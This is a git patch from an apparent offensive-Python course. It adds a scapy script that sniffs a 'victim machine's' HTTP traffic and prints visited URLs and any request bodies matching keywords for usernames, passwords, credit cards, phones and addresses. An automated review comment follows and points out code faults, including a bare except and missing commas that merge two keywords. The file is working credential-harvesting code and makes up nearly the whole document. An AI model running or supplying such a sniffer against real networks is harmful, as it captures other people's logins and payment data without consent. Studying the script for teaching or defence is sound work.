From 4abbfdf26146e2d546b82f9927329d8c15acf1ea Mon Sep 17 00:00:00 2001
From: Manuel Vergara
Date: Mon, 29 Jan 2024 19:28:10 +0100
Subject: [PATCH] Add sniffer scapy
---
.../15_hacking/03_http_sniffer_scapy.py | 105 ++++++++++++++++++
1 file changed, 105 insertions(+)
create mode 100644 python-ofensivo/15_hacking/03_http_sniffer_scapy.py
diff --git a/python-ofensivo/15_hacking/03_http_sniffer_scapy.py b/python-ofensivo/15_hacking/03_http_sniffer_scapy.py
new file mode 100644
index 0000000..2ec7e5e
--- /dev/null
+++ b/python-ofensivo/15_hacking/03_http_sniffer_scapy.py
@@ -0,0 +1,105 @@
+# /usr/bin/env python3
+"""
+HTTP sniffer
+
+Práctica con testphp.vulnweb.com
+
+"""
+
+import argparse
+import signal
+import scapy.all as scapy
+from scapy.layers import http
+
+
+def def_handler(sig, frame):
+
+ print("\n\n[!] Saliendo del programa...\n")
+ exit(1)
+
+
+signal.signal(signal.SIGINT, def_handler)
+
+
+def get_arguments():
+ """
+ Obtiene los argumentos de la línea de comandos
+ """
+
+ parser = argparse.ArgumentParser(description="DNS sniffer")
+ parser.add_argument(
+ "-i", "--interface",
+ required=True, dest="interface",
+ help="Interfaz de red a utilizar"
+ )
+ args = parser.parse_args()
+
+ return args
+
+
+def process_sniffed_packet(packet):
+ """
+ Procesa el paquete sniffado
+ """
+
+ cred_keywords = [
+ "username", "user", "uname", "urname", "user_name", "usern"
+ "login", "password", "pass",
+ "mail", "email", "correo",
+ "phone", "telephone", "tel", "cellphone", "cell", "cel", "movil",
+ "credit", "card", "cc", "tarjeta", "credito", "debito", "debit", "ucc"
+ "address", "direccion", "dir", "street", "calle", "avenue", "av",
+ "location", "city", "country"]
+
+ if packet.haslayer(http.HTTPRequest):
+
+ url = "http://" + \
+ packet[http.HTTPRequest].Host.decode() + \
+ packet[http.HTTPRequest].Path.decode()
+
+ print(f"[+] URL visitada: {url}")
+
+ if packet.haslayer(scapy.Raw):
+
+ try:
+
+ response = packet[scapy.Raw].load.decode()
+
+ for keyword in cred_keywords:
+
+ if keyword in response:
+
+ print(f"[+] Información comprometida: {response}")
+ break
+
+ except:
+
+ pass
+
+
+def sniff(interface):
+ """
+ Sniffing de paquetes
+ """
+
+ print("\n[+] Interceptando paquetes de la máquina victima: \n")
+
+ scapy.sniff(
+ iface=interface, store=False,
+ prn=process_sniffed_packet
+ )
+
+
+def main():
+ """
+ Función principal
+ """
+
+ arguments = get_arguments()
+
+ sniff(arguments.interface)
+
+
+if __name__ == "__main__":
+
+ main()
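Review bot: The bare `except:` with `pass` around the `Raw` payload decode in `process_sniffed_packet` hides every failure, and because `def_handler` leaves via `exit(1)` it can also swallow the `SystemExit` raised when Ctrl-C arrives inside that `try`; narrow it to `except UnicodeDecodeError:`. In `cred_keywords` the commas after `"usern"` and `"ucc"` are missing, so Python joins the adjacent literals into `"usernlogin"` and `"uccaddress"` and the list no longer holds the entries as written. The argparse description still reads `"DNS sniffer"` in an HTTP tool, and the first line `# /usr/bin/env python3` lacks the `!` that would make it a shebang.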